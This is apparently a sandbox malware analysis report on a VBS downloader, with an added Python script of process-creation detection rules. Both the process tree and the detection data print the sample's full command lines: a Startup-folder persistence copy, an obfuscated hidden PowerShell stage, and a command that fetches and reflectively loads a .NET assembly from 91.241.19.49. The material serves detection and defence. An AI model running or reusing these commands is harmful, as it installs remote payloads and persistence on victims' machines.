Analysis
- max time kernel: 119s
- max time network: 122s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 15-12-2021 18:00

Static task: static1
Behavioral task: behavioral1
- Sample: 5d536406d735e27d910faf1813d79e0b.vbs
- Resource: win7-en-20211208
General
- Target: 5d536406d735e27d910faf1813d79e0b.vbs
- Size: 151KB
- MD5: 5d536406d735e27d910faf1813d79e0b
- SHA1: 32f7716ddb61131917a90b83eb7fd74ce5eef16a
- SHA256: 887420d1dcca02056fb9b2aaffacaf87ac76d438fb4e4b9f244cde119db7ebc6
- SHA512: 1b797c0ada2656242d4017ecc33ce4045eece9a982cd4645e9e369e7d62ceed91e4f00ac14203077c349d8f815ed255d7fbe12742575e94f205bc319a9b365df
Malware Config
Extracted
- http://91.241.19.49/ramdes/DownloaderF3.txt
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow 4, pid 1544, powershell.exe
- Drops startup file (2 IoCs)
  Processes: powershell.exe
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs (powershell.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs (powershell.exe)
  The leading space in the file name " IIZ.vbs" is written that way inside the string literal of the copying command line, so hunt for it with the space included.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (Generic signature text; nothing else in this report shows file encryption or a ransom note.)
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (pid 1160), powershell.exe (pid 1604), powershell.exe (pid 1544)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, pid 1160 powershell.exe
  Token: SeDebugPrivilege, pid 1604 powershell.exe
  Token: SeDebugPrivilege, pid 1544 powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Each parent/child pair below was reported three times:
  PID 1080 WScript.exe wrote to memory of PID 680 cmd.exe
  PID 680 cmd.exe wrote to memory of PID 632 PING.EXE
  PID 680 cmd.exe wrote to memory of PID 1160 powershell.exe
  PID 1080 WScript.exe wrote to memory of PID 1604 powershell.exe
  PID 1604 powershell.exe wrote to memory of PID 1544 powershell.exe
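The signatures above describe one chain: WScript.exe runs the .vbs, which spawns cmd.exe to sleep (ping 127.0.0.1 -n 10) and copy itself into the Startup folder, and separately spawns a hidden PowerShell that decodes and runs a second PowerShell that downloads and reflectively loads a .NET assembly. The Python below is an added example, not part of this report or the sample, that turns those observations into process-creation detection rules and runs them over constructed events built from the command lines and PIDs in this report (the $Codigo blob in the PID 1604 event is shortened in the sample data). The -ExecutionPolicy check is a deliberate prefix match because this sample spells it "Bypss"; a rule matching the literal "Bypass" would miss it.

```python
"""Process-creation rules for the WScript -> cmd/ping -> powershell chain."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Constructed events mirroring this report's process tree. Parent/child links
# and PIDs come from the WriteProcessMemory IoCs; PID 1080's parent is unknown
# and set to 0. The base64 blob in PID 1604 is cut to its first 16 characters.
EVENTS = [
    ProcEvent(1080, 0, r"C:\Windows\System32\WScript.exe",
              r'''"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs"'''),
    ProcEvent(680, 1080, r"C:\Windows\System32\cmd.exe",
              r'''"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')'''),
    ProcEvent(632, 680, r"C:\Windows\system32\PING.EXE", r"ping 127.0.0.1 -n 10"),
    ProcEvent(1160, 680, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')'''),
    ProcEvent(1604, 1080, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD'''),
    ProcEvent(1544, 1604, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.sn/tset/94.91.142.19//:ptth'))"'''),
]

# ping to loopback with a count is a sleep, not connectivity testing
RE_PING_DELAY = re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d+", re.I)
RE_STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
RE_HIDDEN = re.compile(r"-windowstyle\s+hidden", re.I)
# prefix match on purpose: this sample writes "-ExecutionPolicy Bypss"
RE_EXEC_BYPASS = re.compile(r"-executionpolicy\s+byp", re.I)
RE_B64 = re.compile(r"FromBase64String\s*\(", re.I)
# .replace('<marker>','<base64 letter>') before decoding: a substituted-alphabet blob
RE_CHARSWAP = re.compile(r"\.replace\('(.)'\s*,\s*'[A-Za-z0-9+/]'\)", re.I)
RE_DOWNLOAD = re.compile(r"\.Download(String|Data)\s*\(", re.I)
# AppDomain.Load as seen here, plus the equally common Assembly.Load form
RE_REFLECTIVE_LOAD = re.compile(
    r"CurrentDomain\.Load\s*\(|\[Reflection\.Assembly\]::Load\s*\(", re.I)


def rule_hits(ev: ProcEvent, parent: Optional[ProcEvent]) -> list:
    """Return the names of every rule this event triggers, in rule order."""
    child = image_name(ev.image)
    par = image_name(parent.image) if parent else ""
    cl = ev.cmdline
    ps = child == "powershell.exe"
    checks = [
        ("script_host_spawns_shell",
         par == "wscript.exe" and child in ("cmd.exe", "powershell.exe")),
        ("ping_delay_then_startup_copy",
         child == "cmd.exe" and bool(RE_PING_DELAY.search(cl))
         and bool(RE_STARTUP_DIR.search(cl))),
        ("powershell_writes_startup_folder",
         ps and bool(RE_STARTUP_DIR.search(cl)) and "::Copy(" in cl),
        ("charswapped_base64_stage",
         ps and bool(RE_B64.search(cl)) and bool(RE_CHARSWAP.search(cl))),
        ("download_and_reflective_load",
         ps and bool(RE_B64.search(cl)) and bool(RE_DOWNLOAD.search(cl))
         and bool(RE_REFLECTIVE_LOAD.search(cl))),
        ("hidden_bypass_powershell",
         ps and bool(RE_HIDDEN.search(cl)) and bool(RE_EXEC_BYPASS.search(cl))),
    ]
    return [name for name, hit in checks if hit]


def evaluate(events: list) -> dict:
    """Map each PID to its rule hits, resolving the parent by ppid."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: rule_hits(e, by_pid.get(e.ppid)) for e in events}


def flagged_pids(events: list) -> list:
    return [pid for pid, hits in evaluate(events).items() if hits]


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(pid, hits)
```

Run against the constructed events, four of the six processes fire: cmd.exe (680) for the ping sleep plus Startup copy, the copying powershell.exe (1160), the decoding powershell.exe (1604) for the character-substituted base64 stage and the hidden/bypass flags, and the final powershell.exe (1544) for download plus reflective load. WScript.exe and PING.EXE themselves produce no hits, which is the point: the parent/child context and the command-line content carry the signal.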
Processes
(Depth markers and PIDs below follow the WriteProcessMemory IoCs above.)

[1] C:\Windows\System32\WScript.exe (PID 1080)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\cmd.exe (PID 680)
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\PING.EXE (PID 632)
        ping 127.0.0.1 -n 10
        - Runs ping.exe

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1160)
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')
        - Drops startup file
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1604)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙HM☙bg☙v☙HQ☙cwBl☙HQ☙Lw☙5☙DQ☙Lg☙5☙DE☙Lg☙x☙DQ☙Mg☙u☙DE☙OQ☙v☙C8☙OgBw☙HQ☙d☙Bo☙Cc☙KQ☙p☙☙==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1544)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.sn/tset/94.91.142.19//:ptth'))"
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 2e1dfce6db3065b49f45898f0ceec668
  SHA1: 2c968d183fd6c63734ae5f1272c77f26adbd83bc
  SHA256: c1778abe9a13c6152ca3a6c6187d2f722483d83418734ec4a214c0647bb0aaaa
  SHA512: 5c8179da4a11d336b65f8ea5c9b4e66633a2d817e72fe337651cac57173c0d3dc83088308272bc9a5111848549367b083ef8833b369b8c400c11357d0b77f44e
  This is a Windows jump-list file written under Recent\CustomDestinations, not a payload; the assembly fetched from DownloaderF3.txt does not appear in this list.
- memory/632-57-0x0000000000000000-mapping.dmp
- memory/680-56-0x0000000000000000-mapping.dmp
- memory/1080-55-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp (8KB)
- memory/1160-69-0x000000000293B000-0x000000000295A000-memory.dmp (124KB)
- memory/1160-60-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmp (11.4MB)
- memory/1160-64-0x000000001B6E0000-0x000000001B9DF000-memory.dmp (3.0MB)
- memory/1160-63-0x0000000002934000-0x0000000002937000-memory.dmp (12KB)
- memory/1160-61-0x0000000002930000-0x0000000002932000-memory.dmp (8KB)
- memory/1160-62-0x0000000002932000-0x0000000002934000-memory.dmp (8KB)
- memory/1160-58-0x0000000000000000-mapping.dmp
- memory/1544-78-0x0000000001FE0000-0x0000000001FE2000-memory.dmp (8KB)
- memory/1544-82-0x0000000001FEB000-0x000000000200A000-memory.dmp (124KB)
- memory/1544-80-0x0000000001FE4000-0x0000000001FE7000-memory.dmp (12KB)
- memory/1544-76-0x000007FEF2B10000-0x000007FEF366D000-memory.dmp (11.4MB)
- memory/1544-79-0x0000000001FE2000-0x0000000001FE4000-memory.dmp (8KB)
- memory/1544-73-0x0000000000000000-mapping.dmp
- memory/1604-71-0x0000000002562000-0x0000000002564000-memory.dmp (8KB)
- memory/1604-77-0x000000000256B000-0x000000000258A000-memory.dmp (124KB)
- memory/1604-72-0x0000000002564000-0x0000000002567000-memory.dmp (12KB)
- memory/1604-70-0x0000000002560000-0x0000000002562000-memory.dmp (8KB)
- memory/1604-68-0x000007FEF2B10000-0x000007FEF366D000-memory.dmp (11.4MB)
- memory/1604-65-0x0000000000000000-mapping.dmp